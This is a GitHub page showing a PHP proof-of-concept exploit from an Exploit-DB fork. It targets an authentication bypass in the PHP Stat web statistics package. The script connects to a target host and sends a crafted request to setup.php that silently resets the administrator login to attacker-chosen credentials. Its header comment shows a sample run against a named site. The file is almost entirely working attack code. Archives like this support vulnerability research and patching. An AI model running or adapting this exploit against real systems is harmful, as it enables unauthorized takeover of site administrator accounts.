forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy path1018.php
More file actions
executable file
·112 lines (82 loc) · 2.81 KB
/
Copy path1018.php
File metadata and controls
executable file
·112 lines (82 loc) · 2.81 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
<?
/*
**************************************************************
PHP Stat Administrative User Authentication Bypass POC Exploit
Code by Nikyt0x - Soulblack Security Research
**************************************************************
Advisory:
http://www.soulblack.com.ar/repo/papers/phpstat_advisory.txt
Saludos:
Soulblack Staff, Status-x, NeosecurityTeam,
KingMetal, SWP, Trespasser...
nikyt0x@gmail.com
http://www.nikyt0x.tk
**************************************************************
**This Exploit Change Admin Username and Password
**Username: admin
**Password: admin
**************************************************************
php sbphpstatpoc.php www.spazfarm.com /spazstats/setup.php
==============================================================
PHP Stat Administrative User Authentication Bypass POC Exploit
==============================================================
by Nikyt0x - Soulblack Security Research
[+] Testing: www.spazfarm.com
[+] Socket
[+] Sending Exploit
[+] OK
Open www.spazfarm.com/spazstats/setup.php
Username: admin
Password: 123456
**************************************************************
*/
// username and password
$username = "admin";
$password = "123456";
function sh0w()
{
echo "\n ==============================================================\n";
echo " PHP Stat Administrative User Authentication Bypass POC Exploit\n";
echo " ==============================================================\n";
echo " by Nikyt0x - Soulblack Security Research\n\n";
}
if ($argc != 3)
{
sh0w();
echo "\n\n Usage:\n sbphpstatpoc.php www.site.com /dir/to/setup.php\n";
exit();
}
if(!ereg('setup.php',$argv[2])) {
echo "URL to setup.php Incorrect.\n";
exit(0);
}
sh0w();
echo " [+] Testing: $argv[1]\n";
$s0ck3t = fsockopen($argv[1], 80);
if (!$s0ck3t) {
echo " [-] Socket\n";
exit(0);
} else {
$petici0n = "GET $argv[2]?check=yes&username=$username&password=$password HTTP/1.1\r\n";
$petici0n .= "Host: $argv[1]\r\n";
$petici0n .= "Connection: Close\r\n\r\n";
echo " [+] Socket\n";
if(!fwrite($s0ck3t, $petici0n))
{
echo " [-] Sending Exploit\n";
exit(0);
}
echo " [+] Sending Exploit\n";
while (!feof($s0ck3t)) {
$g3tdata = fgets($s0ck3t, 1024);
if (eregi('Setup has been updated',$g3tdata))
{
echo " [+] OK\n\n";
echo " Open $argv[1]$argv[2]\n\n Username: $username\n Password: $password\n";
exit();
}
}
fclose($s0ck3t);
}
?>
# milw0rm.com [2005-05-30]